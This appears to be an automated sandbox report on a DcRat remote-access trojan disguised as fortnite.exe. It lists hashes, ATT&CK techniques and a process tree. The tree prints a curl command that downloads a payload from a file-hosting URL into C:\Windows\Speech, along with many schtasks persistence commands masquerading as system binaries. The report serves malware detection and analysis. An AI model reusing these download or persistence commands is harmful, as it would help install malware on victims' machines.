dcrat | 01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f

General

Target

fortnite.exe
Size

1.2MB
MD5

4ce2034a29fa1119013b35414ac146c8
SHA1

1bc3b7ff47f254f3058f8030e7081d48e762b1fc
SHA256

01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f
SHA512

9ff48316eff7b1cf2317ce9c363b596a42100c0f2ff3c17f06c3efe8f3f4b8de93072f594c4dfc7f7cdbf9b4c768643448141ca78bab4db28122f88d3ad64e27
SSDEEP

24576:zMbpm9Z/zQfnkuGKF7rlpC+bKlAtc06Du:PrQnIGz

Score

10^/10

dcrat discovery infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2052	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3068	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3128	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	216	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4564	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2556	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3144	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3636	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3728	4512	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4408	4512	schtasks.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

fortnite.exephysmeme.exeWScript.exeMedal.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	fortnite.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Medal.exe

Executes dropped EXE 2 IoCs

Processes:

physmeme.exeMedal.exe

pid process

3956 physmeme.exe
2456 Medal.exe
Drops file in Windows directory 1 IoCs

Processes:

curl.exe

description ioc process

File created C:\Windows\Speech\physmeme.exe curl.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3956	physmeme.exe
2456	Medal.exe

description	ioc	process
File created	C:\Windows\Speech\physmeme.exe	curl.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

physmeme.exeWScript.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 2 IoCs

Processes:

physmeme.exeMedal.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	Medal.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3068	schtasks.exe
3128	schtasks.exe
3636	schtasks.exe
2356	schtasks.exe
3188	schtasks.exe
2932	schtasks.exe
3988	schtasks.exe
4564	schtasks.exe
396	schtasks.exe
3144	schtasks.exe
2052	schtasks.exe
4408	schtasks.exe
3728	schtasks.exe
2004	schtasks.exe
5032	schtasks.exe
216	schtasks.exe
2556	schtasks.exe
4756	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

unsecapp.exe

pid	process
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe
536	unsecapp.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

unsecapp.exe

pid process

536 unsecapp.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

unsecapp.exe

description pid process

Token: SeDebugPrivilege 536 unsecapp.exe

description	pid	process
Token: SeDebugPrivilege	536	unsecapp.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

fortnite.execmd.exephysmeme.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 2944 wrote to memory of 536	2944	fortnite.exe	cmd.exe
PID 2944 wrote to memory of 536	2944	fortnite.exe	cmd.exe
PID 2944 wrote to memory of 2348	2944	fortnite.exe	cmd.exe
PID 2944 wrote to memory of 2348	2944	fortnite.exe	cmd.exe
PID 536 wrote to memory of 4400	536	cmd.exe	curl.exe
PID 536 wrote to memory of 4400	536	cmd.exe	curl.exe
PID 2944 wrote to memory of 3956	2944	fortnite.exe	physmeme.exe
PID 2944 wrote to memory of 3956	2944	fortnite.exe	physmeme.exe
PID 2944 wrote to memory of 3956	2944	fortnite.exe	physmeme.exe
PID 3956 wrote to memory of 3680	3956	physmeme.exe	WScript.exe
PID 3956 wrote to memory of 3680	3956	physmeme.exe	WScript.exe
PID 3956 wrote to memory of 3680	3956	physmeme.exe	WScript.exe
PID 3680 wrote to memory of 3752	3680	WScript.exe	cmd.exe
PID 3680 wrote to memory of 3752	3680	WScript.exe	cmd.exe
PID 3680 wrote to memory of 3752	3680	WScript.exe	cmd.exe
PID 3752 wrote to memory of 2456	3752	cmd.exe	Medal.exe
PID 3752 wrote to memory of 2456	3752	cmd.exe	Medal.exe
PID 1908 wrote to memory of 1560	1908	cmd.exe	chcp.com
PID 1908 wrote to memory of 1560	1908	cmd.exe	chcp.com
PID 1908 wrote to memory of 4404	1908	cmd.exe	w32tm.exe
PID 1908 wrote to memory of 4404	1908	cmd.exe	w32tm.exe
PID 1908 wrote to memory of 536	1908	cmd.exe	unsecapp.exe
PID 1908 wrote to memory of 536	1908	cmd.exe	unsecapp.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fortnite.exe
"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2348
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3956
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3752
    - - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Bc6dBJ96by.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1908
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1560
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4404
        
        C:\Recovery\WindowsRE\unsecapp.exe
        
        "C:\Recovery\WindowsRE\unsecapp.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\browser\features\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\browser\features\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\browser\features\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 10 /tr "'C:\Windows\Registration\CRMLog\fortnite.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\fortnite.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnitef" /sc MINUTE /mo 12 /tr "'C:\Windows\Registration\CRMLog\fortnite.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 6 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat

Filesize
63B

MD5
e24619181276af563705f4b1bed29490

SHA1
fddac27290319f69543f5330fe97c122a8a01376

SHA256
eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05

SHA512
1898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591

Download Submit
C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe

Filesize
224B

MD5
96d43070e1e39d421c53a2f8dca13fc6

SHA1
07417cccceddbf8d5f5b48dec0b2e08d53a4754f

SHA256
0dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314

SHA512
9fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398

Download Submit
C:\Medal\Medal.exe

Filesize
1.8MB

MD5
4f66bbfed3a524398bd0267ed974ccbc

SHA1
b2567397dc823412d87a23428c7833ff74586b7d

SHA256
fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8

SHA512
bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
2.1MB

MD5
f4620c0afa8e21897509b2e7215097f5

SHA1
af216ca6105e271a3fb45a23c10ee7cf3158b7e1

SHA256
8daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82

SHA512
68b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd

Download Submit
memory/536-14-0x00000000006A0000-0x000000000087E000-memory.dmp

Filesize
1.9MB

Download
memory/536-16-0x0000000000F50000-0x0000000000F5E000-memory.dmp

Filesize
56KB

Download
memory/536-18-0x00000000029F0000-0x0000000002A0C000-memory.dmp

Filesize
112KB

Download
memory/536-19-0x000000001C300000-0x000000001C350000-memory.dmp

Filesize
320KB

Download
memory/536-21-0x0000000002A10000-0x0000000002A28000-memory.dmp

Filesize
96KB

Download
memory/536-23-0x0000000002950000-0x000000000295E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads